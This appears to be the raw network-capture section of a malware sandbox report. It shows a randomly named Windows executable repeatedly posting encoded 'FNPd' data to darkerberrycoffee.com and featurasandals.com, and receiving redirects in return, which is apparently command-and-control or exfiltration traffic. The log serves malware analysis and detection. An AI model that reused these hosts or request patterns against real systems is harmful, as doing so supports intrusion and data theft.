                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 54 65 75 38 37 36 4a 66 50 52 70 2b 48 76 76 61 46 46 75 74 52 38 4b 33 4d 42 77 4a 47 39 74 45 74 39 62 75 54 55 31 53 48 49 61 53 6a 58 71 35 77 44 46 42 7a 50 59 68 46 7a 5a 76 79 4e 34 52 42 47 47 42 4f 6e 53 32 50 75 7a 70 62 63 7a 58 59 62 58 4b 74 4b 59 6b 4a 6e 68 2f 76 6b 4f 65 53 65 35 4d 74 6a 66 56 44 72 4e 63 2f 34 4d 48 53 43 52 36 55 67 59 5a 67 4b 31 63 4e 68 57 45 6c 36 5a 35 39 34 62 64 38 44 4c 7a 5a 52 35 2b 67 73 32 5a 67 38 71 52 47 43 61 38 67 61 78 6e 47 55 63 70 75 33 64 77 38 49 67 6a 48 73 5a 45 6c 50 55 6b 6a 4a 4c 58 50 48 70 6e 46 79 4c 7a 61 64 4b 48 56 6a 57 79 35 64 46 4b 61 57 56 43 4a 61 2f 68 75 51 3d 3d
                                  Data Ascii: FNPd=p1Wi8zz071OLTeu876JfPRp+HvvaFFutR8K3MBwJG9tEt9buTU1SHIaSjXq5wDFBzPYhFzZvyN4RBGGBOnS2PuzpbczXYbXKtKYkJnh/vkOeSe5MtjfVDrNc/4MHSCR6UgYZgK1cNhWEl6Z594bd8DLzZR5+gs2Zg8qRGCa8gaxnGUcpu3dw8IgjHsZElPUkjJLXPHpnFyLzadKHVjWy5dFKaWVCJa/huQ==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.6497173.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:37.840804100 CEST1806OUTPOST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 54 65 75 38 37 36 4a 66 50 52 70 2b 48 76 76 61 46 46 75 74 52 38 4b 33 4d 42 77 4a 47 39 6c 45 75 4c 58 75 54 31 31 53 47 49 61 53 75 33 71 34 77 44 46 4d 7a 4f 39 70 46 7a 56 56 79 50 41 52 41 6c 2b 42 66 32 53 32 55 65 7a 70 47 4d 7a 57 46 72 58 66 74 4f 38 67 4a 6e 52 2f 76 6b 4f 65 53 63 78 4d 71 79 66 56 46 72 4e 66 32 59 4d 54 66 69 52 42 55 67 67 6a 67 4b 35 4d 4e 77 32 45 6b 61 4a 35 36 4b 7a 64 7a 44 4c 31 61 52 34 6a 67 73 71 61 67 38 6d 72 47 44 2f 70 67 61 46 6e 45 42 6c 69 31 6c 5a 63 39 4f 30 58 45 37 70 5a 69 66 64 61 6f 4c 48 50 4d 6c 31 39 63 67 58 47 44 72 53 75 64 41 37 6b 34 4c 70 65 51 68 4a 57 43 36 79 7a 30 32 6e 66 6e 37 47 73 71 31 5a 64 53 4a 75 78 35 46 42 42 6d 56 6a 70 2b 34 5a 6c 37 2f 63 59 4a 4e 5a 4d 33 4b 64 46 41 7a 35 5a 33 59 52 59 72 45 2b 6b 2b 61 43 54 31 37 34 63 33 2b 4d 65 39 51 57 32 58 78 61 4f 52 64 4d 6b 55 66 48 4b 33 6b 72 79 6f 67 4f 76 6e 55 64 67 4d 48 56 4e 73 42 7a 38 44 6d 36 65 51 49 74 4e 69 [TRUNCATED]
                                  Data Ascii: FNPd=p1Wi8zz071OLTeu876JfPRp+HvvaFFutR8K3MBwJG9lEuLXuT11SGIaSu3q4wDFMzO9pFzVVyPARAl+Bf2S2UezpGMzWFrXftO8gJnR/vkOeScxMqyfVFrNf2YMTfiRBUggjgK5MNw2EkaJ56KzdzDL1aR4jgsqag8mrGD/pgaFnEBli1lZc9O0XE7pZifdaoLHPMl19cgXGDrSudA7k4LpeQhJWC6yz02nfn7Gsq1ZdSJux5FBBmVjp+4Zl7/cYJNZM3KdFAz5Z3YRYrE+k+aCT174c3+Me9QW2XxaORdMkUfHK3kryogOvnUdgMHVNsBz8Dm6eQItNiZn7mZGJTQICamIK47RD8gzP4kNxFhK3NGei/gOm9HpvTpZ3AhLbdtWwJNmhq3orrrZhfK5k++J0XKLamVC4X75Eiao5nwnJcf6pCeudRhMajMFVfsxKu9lP6xXJ1giOHKbUm3QR7KdbBMQZFB7aEhQftTjs9MZ0j02QtKbXyWgXGA3TSJgsnpRWJnV35RlinS2wul0Lm63QiNSSkmCIVZQRmhtVEbOYchhE+pUZ3kRwHhjrVhIc0MdGGz8SdVZyv/XFZxH9cT6oXA8WMtdTqjauIo2eFAuihKK1j/6VEAtQcak6TfgFqUIHMMAA1GVK38pPj64vEEqH//Lc/3ISGdogAVRgDB92agj6ABkE0eJhMDnfkutYyi92VW1oxAHsWIMFo9n5VZZngEIfUUpiCIaMv5hsd09Q3kZwG7bSr3PMP8y2UJ29AD9kZ3yBem+dk79S2A/UMtPi6a0FYKJBa2jlICVXIOisPoOBARvqsSjIvO2s9Qt/Rq2PVgk7WorYWysH1zv/P/CqN3rZm9Dx+x5f9WuGtXpWFK+0PLBVKHGKtsaOIcSp5xhyply7utivgzIG1eUsdubnbPTfwmlTngHGVdUAdvO4f04RBPGEV2zEiZD1KkBThNY+HdLSf+gUfGHKZ1ADpoxSJJBLeNBwwXkdfmpxUmqN+T3 [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.6497183.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:40.382894039 CEST500OUTGET /q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:41.188873053 CEST418INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:19:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 6b 33 2b 43 2f 48 7a 31 31 6c 37 47 47 4d 62 74 79 61 4a 77 46 77 4a 70 4a 4d 44 4b 42 31 65 7a 58 76 43 42 45 77 51 76 46 73 39 4a 6e 62 66 43 56 52 34 43 46 62 2b 77 6e 51 36 2b 31 78 68 77 6a 65 67 6d 47 6b 64 55 70 34 31 6d 4e 47 43 4f 65 57 53 78 52 2b 54 2b 61 36 6a 75 57 36 4c 68 6a 70 63 52 66 45 64 38 70 57 4b 73 56 4e 4a 46 6c 41 53 33 4a 62 6c 77 70 2f 59 35 65 41 64 61 55 55 63 53 6f 4b 4d 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>
                                  May 23, 2024 15:19:41.193607092 CEST418INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:19:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 6b 33 2b 43 2f 48 7a 31 31 6c 37 47 47 4d 62 74 79 61 4a 77 46 77 4a 70 4a 4d 44 4b 42 31 65 7a 58 76 43 42 45 77 51 76 46 73 39 4a 6e 62 66 43 56 52 34 43 46 62 2b 77 6e 51 36 2b 31 78 68 77 6a 65 67 6d 47 6b 64 55 70 34 31 6d 4e 47 43 4f 65 57 53 78 52 2b 54 2b 61 36 6a 75 57 36 4c 68 6a 70 63 52 66 45 64 38 70 57 4b 73 56 4e 4a 46 6c 41 53 33 4a 62 6c 77 70 2f 59 35 65 41 64 61 55 55 63 53 6f 4b 4d 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.649719104.21.28.203803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:46.313193083 CEST760OUTPOST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 58 33 52 52 79 65 47 54 76 4e 38 49 70 50 5a 37 44 74 2b 64 44 70 49 39 61 45 75 50 56 78 38 4a 36 6b 4b 47 78 65 30 77 68 39 6d 5a 6e 41 57 56 4b 41 4b 2f 64 76 47 48 45 4c 6f 6d 65 64 32 68 65 54 4d 4b 71 65 69 48 76 68 4c 4f 37 57 51 75 4d 6b 6b 7a 51 51 74 73 68 58 50 4a 68 34 6b 69 73 75 77 59 64 55 73 6b 6d 5a 4a 34 52 62 4c 71 37 58 42 36 78 5a 44 43 74 64 7a 61 42 4b 2f 64 4c 75 38 6c 6e 53 32 69 30 52 74 65 38 76 6c 72 56 2f 51 42 55 32 7a 57 57 70 38 4f 65 62 52 70 72 34 59 71 53 70 39 72 74 35 54 75 44 48 43 31 78 73 33 45 57 4e 4d 6a 65 36 72 42 61 41 32 38
                                  Data Ascii: FNPd=7Z+yU7FanQKmX3RRyeGTvN8IpPZ7Dt+dDpI9aEuPVx8J6kKGxe0wh9mZnAWVKAK/dvGHELomed2heTMKqeiHvhLO7WQuMkkzQQtshXPJh4kisuwYdUskmZJ4RbLq7XB6xZDCtdzaBK/dLu8lnS2i0Rte8vlrV/QBU2zWWp8OebRpr4YqSp9rt5TuDHC1xs3EWNMje6rBaA28
                                  May 23, 2024 15:19:46.782608032 CEST858INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:46 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:46 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAgS7eVIheWUw60c3%2F1W%2BBk5rOXr2Y9HkPaaWRs7b5fpxmBC5MwOH4bjfaskXxvJd8oUbF2PRL6uM6N3lmxCVeH3ODXJMf6EjRNqMuf%2F1I0O6c%2FPMTqUJOHzwmWI%2F5OCnvOfPT1idBiB"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 888556ed0ddb72bc-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.649720104.21.28.203803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:49.011176109 CEST784OUTPOST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 57 58 42 52 69 4e 2b 54 2f 64 38 4a 6e 76 5a 37 59 39 2b 5a 44 70 45 39 61 42 65 66 55 43 59 4a 36 45 36 47 77 63 63 77 67 39 6d 5a 74 67 57 51 45 67 4b 6b 64 76 4b 68 45 50 73 6d 65 65 4b 68 65 54 38 4b 2f 35 32 59 75 78 4c 4d 30 32 51 6f 53 55 6b 7a 51 51 74 73 68 55 7a 33 68 38 41 69 74 65 41 59 65 32 45 6e 35 70 4a 2f 62 37 4c 71 2f 58 42 2b 78 5a 43 74 74 63 75 78 42 50 6a 64 4c 73 6b 6c 6e 41 53 68 76 42 74 63 78 50 6b 47 56 63 39 56 63 45 71 36 4a 59 63 30 4f 61 70 4b 71 4f 5a 77 4f 61 39 49 2f 70 7a 73 44 46 61 48 78 4d 33 75 55 4e 30 6a 4d 74 6e 6d 56 30 54 66 4b 45 51 79 39 4b 5a 4d 77 37 52 4e 7a 2b 56 67 61 63 4c 2f 67 41 3d 3d
                                  Data Ascii: FNPd=7Z+yU7FanQKmWXBRiN+T/d8JnvZ7Y9+ZDpE9aBefUCYJ6E6Gwccwg9mZtgWQEgKkdvKhEPsmeeKheT8K/52YuxLM02QoSUkzQQtshUz3h8AiteAYe2En5pJ/b7Lq/XB+xZCttcuxBPjdLsklnAShvBtcxPkGVc9VcEq6JYc0OapKqOZwOa9I/pzsDFaHxM3uUN0jMtnmV0TfKEQy9KZMw7RNz+VgacL/gA==
                                  May 23, 2024 15:19:49.705290079 CEST850INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:49 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxHQLrPLm7pJcb0hqtr3enLJHdtx1fmfchZoHbUQ3Qzklj2IOuBTjAJEdg64aooIeZWV5rxCr6N9U%2BVksZ39jG2KtrsgLdNxNNUMAcPoKpbRZyBmRk0sEwtdbSoPedq5JAhyekd346nN"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 888556ff1dfe0c7c-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.649721104.21.28.203803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:51.538719893 CEST1797OUTPOST /tqo3/ HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.featurasandals.com
                                  Referer: http://www.featurasandals.com/tqo3/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 5a 2b 79 55 37 46 61 6e 51 4b 6d 57 58 42 52 69 4e 2b 54 2f 64 38 4a 6e 76 5a 37 59 39 2b 5a 44 70 45 39 61 42 65 66 55 43 51 4a 37 33 43 47 78 36 55 77 6e 39 6d 5a 32 67 57 52 45 67 4c 6b 64 76 43 74 45 50 67 51 65 59 47 68 59 43 63 4b 37 34 32 59 6e 78 4c 4d 2f 57 51 70 4d 6b 6b 71 51 51 38 6c 68 58 62 33 68 38 41 69 74 64 59 59 4b 30 73 6e 37 70 4a 34 52 62 4b 6c 37 58 42 47 78 5a 62 61 74 63 71 48 42 63 37 64 4b 4d 30 6c 68 79 4b 68 6a 42 74 61 39 76 6b 65 56 63 78 6a 63 45 6d 49 4a 59 6f 53 4f 5a 31 4b 71 50 63 4f 63 34 6f 51 71 61 6e 4c 55 32 36 56 34 59 37 4f 55 37 77 43 4c 50 76 4e 56 6d 71 77 46 77 59 71 2b 73 55 42 6d 71 64 6b 7a 2b 41 46 54 39 32 32 2f 47 4e 41 70 6a 79 61 6d 67 55 2f 58 68 41 48 72 2f 70 42 76 45 30 73 32 61 4b 6a 6d 62 45 57 4f 30 34 35 70 54 59 57 46 75 43 74 58 55 6f 77 31 55 4d 41 65 67 51 58 50 44 37 75 33 55 39 30 6c 4f 6d 4e 47 55 6b 39 5a 78 50 54 42 38 51 61 67 38 4f 42 76 66 41 53 49 35 4e 56 43 33 54 4b 55 38 62 6d 6b 6d 51 76 34 59 55 37 75 [TRUNCATED]
                                  Data Ascii: FNPd=7Z+yU7FanQKmWXBRiN+T/d8JnvZ7Y9+ZDpE9aBefUCQJ73CGx6Uwn9mZ2gWREgLkdvCtEPgQeYGhYCcK742YnxLM/WQpMkkqQQ8lhXb3h8AitdYYK0sn7pJ4RbKl7XBGxZbatcqHBc7dKM0lhyKhjBta9vkeVcxjcEmIJYoSOZ1KqPcOc4oQqanLU26V4Y7OU7wCLPvNVmqwFwYq+sUBmqdkz+AFT922/GNApjyamgU/XhAHr/pBvE0s2aKjmbEWO045pTYWFuCtXUow1UMAegQXPD7u3U90lOmNGUk9ZxPTB8Qag8OBvfASI5NVC3TKU8bmkmQv4YU7uxl7vCBuJVpLzsTJ4AIZPjO0fSKEDERC+zbEuN4ICdtYJwYLAIbMkRkxhblpYcKUZ7gyKZU9HR1RfSMJd6Y3Y9SG7VY2gWKAitHiE4P3kJcbblte4qmot/pyC3v2SzO5+WhaHDpW6wyRPExXf9egmTastawOkeyWelak0KagpEt5z/HmvmehFADgilvC01Lb7RyWJe5JKsoLoYwIh070X/8YwAb382tF9xjmSDUXGelk2h3FbJXIHw/CM4wJTsy7l4cultXmuWA5XYoSqWqG+xCWf0xNPHAnNX1s5mThaz5G6951Zd6CAw4tLugNMRa8Iob4laHXiirB4021s/Yb2vQalRYsNIXx0tV6AxvmzdiL4ZJ4MJQRGdmfLp/Z/QKjYeodu1lL5+cNbuI64YhGoMUY6uHwHpFKt5qZv7c7448CEsnpveePOMEIjivUJB08sUlKgrIppVDjcnlms+Ey33WWJIfIkFbOfAgD42oDgUOFVDA42N03C3vWZJrv6g/qtTqCjn0OVU4KMMOhy4JxIcGzDReY8BGJtGHmPNDaTLw7Svx2/HtYJFuz7tSESqI8CZX8jqjTekJTygbwCfvllFPlOpkkzLGDH966wh0ver1G+cWoM3QfjI5Zr47jLFWv+80mTzbtQQ7nfKtmhoBJmXNNK74w1Pv+GOJ [TRUNCATED]
                                  May 23, 2024 15:19:51.997980118 CEST858INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:51 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:51 GMT
                                  Location: https://www.featurasandals.com/tqo3/
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cPKO0fCKvaYbqEwsP9%2FMUZiUGGlmkue%2Bm7xbvfhn5%2BbibnCe47%2FWE6TTXNuFNHod%2Bgaxy0yyHd4iO8DY58ug8fBRD1jMbcqJSL9qSXPDhSZ06YaftMvYnFzZ0qikF10TGpKURayXCsRs"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Vary: Accept-Encoding
                                  Server: cloudflare
                                  CF-RAY: 8885570d9fe58c41-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.649722104.21.28.203803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:54.075609922 CEST497OUTGET /tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.featurasandals.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:54.636269093 CEST995INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 23 May 2024 13:19:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 167
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 23 May 2024 14:19:54 GMT
                                  Location: https://www.featurasandals.com/tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VoGgMJYnh1vKokq3qoHL6SquveglcZ9yl2LWaYVk2PCYn4oas77LRDeTS0PzlPGajoBWxaDCQj3A4F%2FluNwz29Z4GkOPaXTe9sBiRB%2FU%2FAtjOP3JLA3VyUgVwIkjpN93m2j2473cLxpm"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8885571e186f1912-EWR
                                  alt-svc: h3=":443"; ma=86400
